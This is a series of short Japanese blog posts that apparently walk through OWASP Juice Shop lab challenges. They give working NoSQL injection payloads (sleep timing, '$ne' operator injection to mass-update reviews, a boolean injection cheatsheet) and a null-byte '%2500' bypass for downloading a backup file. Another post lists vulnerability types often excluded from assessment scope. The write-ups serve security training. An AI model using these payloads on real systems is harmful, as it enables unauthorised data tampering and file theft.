Hello there, ('ω')ノ
これまでNoSQLについてやってきてなかったようで。
今回は、Burpの拡張機能を試してみることに。
まずはインストールして。
レビューを書いて。
リクエストからディレクトリを確認して。
productsディレクトリに絞ってスキャンすることに。
結果、検出されたもののTentativeとあって暫定のようで。
Noteには、NoSQLi Scannerの表示があって機能しているようで。
リクエスト内容を確認して。
リピータで確認するとレスポンスに遅延が生じるので脆弱性ありと判断して。
GET /rest/products/sleep(1000)/reviews
他には、すべての製品を表示させるには、下記のようなペイロードもあって。
GET /rest/products/1||true/reviews
アクティブスキャンのためか、システムが動かなくなってしまった。
Best regards, (^^ゞ
Hello there, ('ω')ノ
複数の製品レビューを同時に更新しなさいと。
まずは、レビューを書いて動作確認を。
パラメータのあるリクエストをリピータへ。
PUTメソッドは、POSTと違ってリソース名を指定して。
作成もしくは更新をかけるメソッドで。
メッセージを変更して、Sendすると。
正常に追加されていて。
メソッドをGETに変更してSendしてみると。
productが1の情報がすべて取得できて。
GET /rest/products/1/reviews
すべてのproductということで、番号を削除してSendしてみるとうまくいかず。
GET /rest/products/reviews
番号の代わりに*でも。
GET /rest/products/*/reviews
次に負の数字だと。
GET /rest/products/-1/reviews
URLのパラメータに番号があると製品を指定することになるので削除して。
リソースを部分(メッセージのみ)更新したいのでPATCHメソッドに変更して。
PATCH /rest/products/reviews
すべてのidを対象としたいので、ありえないidを指定してインジェクションを。
{
"id":{"$ne":-1},
"message":"rev plus plus plus"
}
ちなみにBoolean Injection Cheatsheetは、下記のとおりで。
{"$ne": -1}
{"$in": []}
{"$and": [ {"id": 5}, {"id": 6} ]}
{"$where": "return true"}
{"$or": [{},{"foo":"1"}]}
site.com/page?query=term || '1'=='1
site.com/page?user[$ne]=nobody
site.com/page?user=;return true
クリアできた。
念のため確認を。
Best regards, (^^ゞ
Hello there, ('ω')ノ
脆弱性診断ともなると以外と経費がかかるもので。
ただ、依頼はしたものの報告される脆弱性が軽微なものが多かったりと。
真面目にすべてを改修しようとすると時間も経費もかかったり。
診断企業に依頼する際には、対象外の脆弱性を示すことひとつの策だったり。
たとえば、報告するのに十分なほど重大でない脆弱性を対象外としたり。
対象外の脆弱性(例)
・プログラムが所有/運営していないコンテンツ/サービスのバグ
・サポートされていないブラウザのユーザに影響を与える脆弱性
・範囲外のドメインのサブドメインの乗っ取り
・ありえない量のユーザインタラクションを必要とするSelf-XSS、またはXSSバグ
・匿名ユーザが利用できるフォームのCSRF
・静的ページでのユーザーインターフェイスのクリックジャッキング
・エラーメッセージ
・HTTP404コード/ページ、またはその他のHTTP非200コード/ページ
・フィンガープリントバナーの開示、公開情報の開示
・既知の公開ファイルまたはディレクトリの開示
・スクリプト、またはその他の自動化と意図された機能のブルートフォーシング
・「オートコンプリート」または「パスワードの保存」機能の存在
・安全なHttpOnlyCookieフラグの欠如
・HTTPS混合コンテンツ
・HTTPセキュリティヘッダーがありません
Strict-Transport-Security
X-Frame-Options
X-XSS-Protection
X-Content-Type-Options
Content-Security-Policy
Best regards, (^^ゞ
Hello there, ('ω')ノ
ショップから削除された安全でない製品を特定して。
どの成分が危険であるかをショップに知らせなさいと。
まずは、製品を表示させて。
リクエストをリピータへ。
SQLインジェクションで、製品情報を表示させて。
ここまでが脆弱性診断の範囲で。
ここからは、ペネトレーションの領域で。
下記のようなワードで検索をして情報収集を。
Cherymoya Annona cherimola Jabuticaba Myrciaria cauliflora Bael Aegle marmelos ingredients dangerous
下記のサイトには、ヒントになりそうな情報が。
問題のリンクで、下記の成分について報告すると。
Eurogium Edule and Hueteroneel and Akebia Quinata
クリアできた。
Best regards, (^^ゞ
Hello there, ('ω')ノ
セールスマンの忘れたバックアップファイルにアクセスしなさいと。
なんだか同じような問題が多いような。
いつものディレクトリにアクセスして。
その中から下記のファイルを選んで。
http://localhost:3000/ftp/coupons_2013.md.bak
いつものようにヌルバイトを追加して拡張子を追加して開くことに。
http://localhost:3000/ftp/coupons_2013.md.bak%2500.md
このファイルでよいのかわかりませんが。
クリアできた。
Best regards, (^^ゞ
